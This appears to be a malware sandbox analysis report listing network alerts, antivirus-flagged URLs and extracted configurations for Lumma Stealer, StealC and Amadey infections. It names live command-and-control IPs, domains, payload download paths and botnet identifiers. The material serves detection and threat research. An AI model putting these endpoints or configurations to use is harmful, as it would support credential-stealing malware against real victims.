2024-11-11T10:34:27.496220+0100	2028371	3	Unknown Traffic	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:29.067290+0100	2028371	3	Unknown Traffic	192.168.2.5	50153	188.114.96.3	443	TCP
2024-11-11T10:34:30.708023+0100	2028371	3	Unknown Traffic	192.168.2.5	50155	188.114.96.3	443	TCP
2024-11-11T10:34:33.677586+0100	2028371	3	Unknown Traffic	192.168.2.5	50157	188.114.96.3	443	TCP
2024-11-11T10:34:36.720502+0100	2028371	3	Unknown Traffic	192.168.2.5	50160	188.114.96.3	443	TCP
2024-11-11T10:34:38.110600+0100	2028371	3	Unknown Traffic	192.168.2.5	50162	188.114.96.3	443	TCP
2024-11-11T10:34:39.979610+0100	2028371	3	Unknown Traffic	192.168.2.5	50164	188.114.96.3	443	TCP
2024-11-11T10:34:50.489142+0100	2028371	3	Unknown Traffic	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:52.035456+0100	2028371	3	Unknown Traffic	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:34:53.101604+0100	2028371	3	Unknown Traffic	192.168.2.5	50175	188.114.96.3	443	TCP
2024-11-11T10:34:54.425265+0100	2028371	3	Unknown Traffic	192.168.2.5	50176	188.114.96.3	443	TCP
2024-11-11T10:34:55.744072+0100	2028371	3	Unknown Traffic	192.168.2.5	50178	188.114.96.3	443	TCP
2024-11-11T10:34:57.758297+0100	2028371	3	Unknown Traffic	192.168.2.5	50180	188.114.96.3	443	TCP
2024-11-11T10:34:59.531358+0100	2028371	3	Unknown Traffic	192.168.2.5	50181	188.114.96.3	443	TCP
2024-11-11T10:35:01.448454+0100	2028371	3	Unknown Traffic	192.168.2.5	50184	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:11.838347+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:13.202217+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:26.969229+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:27.855727+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:40.323796+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50164	188.114.96.3	443	TCP
2024-11-11T10:34:50.783923+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:52.391649+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:35:01.717513+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50184	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:11.838347+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:26.969229+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:50.783923+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50171	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:13.202217+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:27.855727+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:52.391649+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50173	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:11.388665+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:12.316320+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:13.843697+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50127	188.114.96.3	443	TCP
2024-11-11T10:34:15.206443+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50128	188.114.96.3	443	TCP
2024-11-11T10:34:16.511003+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50131	188.114.96.3	443	TCP
2024-11-11T10:34:17.830825+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50134	188.114.96.3	443	TCP
2024-11-11T10:34:19.247560+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50135	188.114.96.3	443	TCP
2024-11-11T10:34:22.737102+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50146	188.114.96.3	443	TCP
2024-11-11T10:34:26.542043+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:27.496220+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:29.067290+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50153	188.114.96.3	443	TCP
2024-11-11T10:34:30.708023+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50155	188.114.96.3	443	TCP
2024-11-11T10:34:33.677586+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50157	188.114.96.3	443	TCP
2024-11-11T10:34:36.720502+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50160	188.114.96.3	443	TCP
2024-11-11T10:34:38.110600+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50162	188.114.96.3	443	TCP
2024-11-11T10:34:39.979610+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50164	188.114.96.3	443	TCP
2024-11-11T10:34:50.489142+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:52.035456+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:34:53.101604+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50175	188.114.96.3	443	TCP
2024-11-11T10:34:54.425265+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50176	188.114.96.3	443	TCP
2024-11-11T10:34:55.744072+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50178	188.114.96.3	443	TCP
2024-11-11T10:34:57.758297+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50180	188.114.96.3	443	TCP
2024-11-11T10:34:59.531358+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50181	188.114.96.3	443	TCP
2024-11-11T10:35:01.448454+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.5	50184	188.114.96.3	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:11.600116+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50123	185.215.113.43	80	TCP
2024-11-11T10:34:16.172383+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50129	185.215.113.43	80	TCP
2024-11-11T10:34:22.433611+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50144	185.215.113.43	80	TCP
2024-11-11T10:34:27.012353+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50151	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.788678+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	59312	1.1.1.1	53	UDP
2024-11-11T10:34:25.978974+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	65292	1.1.1.1	53	UDP
2024-11-11T10:34:49.928323+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	49912	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.812975+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	54467	1.1.1.1	53	UDP
2024-11-11T10:34:26.005989+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	61173	1.1.1.1	53	UDP
2024-11-11T10:34:49.954941+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	64925	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.888058+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	52803	1.1.1.1	53	UDP
2024-11-11T10:34:26.082040+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	52363	1.1.1.1	53	UDP
2024-11-11T10:34:50.026568+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	64513	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.912886+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.5	55647	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.863244+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	50326	1.1.1.1	53	UDP
2024-11-11T10:34:26.058182+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	65154	1.1.1.1	53	UDP
2024-11-11T10:34:50.001465+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	63653	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.760695+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	61903	1.1.1.1	53	UDP
2024-11-11T10:34:25.951411+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	53486	1.1.1.1	53	UDP
2024-11-11T10:34:49.899529+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	60714	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.838333+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	60463	1.1.1.1	53	UDP
2024-11-11T10:34:26.032049+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	59595	1.1.1.1	53	UDP
2024-11-11T10:34:49.977924+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	64007	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:02.405929+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:02.399757+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:02.604321+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:03.592082+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:02.615287+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49704	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:18.230564+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50134	188.114.96.3	443	TCP
2024-11-11T10:34:58.140095+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50180	188.114.96.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:02.196042+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:34:16.413152+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50130	185.215.113.206	80	TCP
2024-11-11T10:34:23.618776+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50148	185.215.113.206	80	TCP
2024-11-11T10:34:35.644574+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50159	185.215.113.206	80	TCP
2024-11-11T10:34:45.672604+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50168	185.215.113.206	80	TCP
2024-11-11T10:34:59.965623+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50182	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:04.872720+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50120	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:10.958584+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50121	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:07.698819+0100	2803305	3	Unknown Traffic	192.168.2.5	50122	185.215.113.16	80	TCP
2024-11-11T10:34:12.243542+0100	2803305	3	Unknown Traffic	192.168.2.5	50125	185.215.113.16	80	TCP
2024-11-11T10:34:23.086396+0100	2803305	3	Unknown Traffic	192.168.2.5	50145	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:04.271374+0100	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:33:23.283544+0100	2803304	3	Unknown Traffic	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:24.465595+0100	2803304	3	Unknown Traffic	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:25.151140+0100	2803304	3	Unknown Traffic	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:25.577089+0100	2803304	3	Unknown Traffic	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:26.247620+0100	2803304	3	Unknown Traffic	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:26.652970+0100	2803304	3	Unknown Traffic	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:30.995874+0100	2803304	3	Unknown Traffic	192.168.2.5	49908	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:19.251567+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50135	188.114.96.3	443	TCP
2024-11-11T10:34:38.116308+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50162	188.114.96.3	443	TCP
2024-11-11T10:34:59.535570+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50181	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllL	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exeed	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllWB	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/a	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/c	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/15.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#7	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exeR	Avira URL Cloud: Label: phishing
Source: https://navygenerayk.store/~	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/Lu~	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/s	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpo)%	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllHC	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpzpJS	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllzCe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php/d	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/D%	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php7	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/api(	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpW	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncoded%	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/0	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php;D	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpR	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpX	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/apieuf	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php;.	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Z	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exe61395d7	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpg	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpd	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/hs	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpp	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpe	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000015.00000002.2446509016.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.984.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: 167c7bdf2f.exe.7824.24.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "founpiuer.store", "fadehairucw.store", "navygenerayk.store", "thumbystriw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C7BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B4440 PK11_PrivDecrypt,	0_2_6C7B4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C784420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B44C0 PK11_PubEncrypt,	0_2_6C7B44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C798670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C7BA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C79E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C7DA730

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50184 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
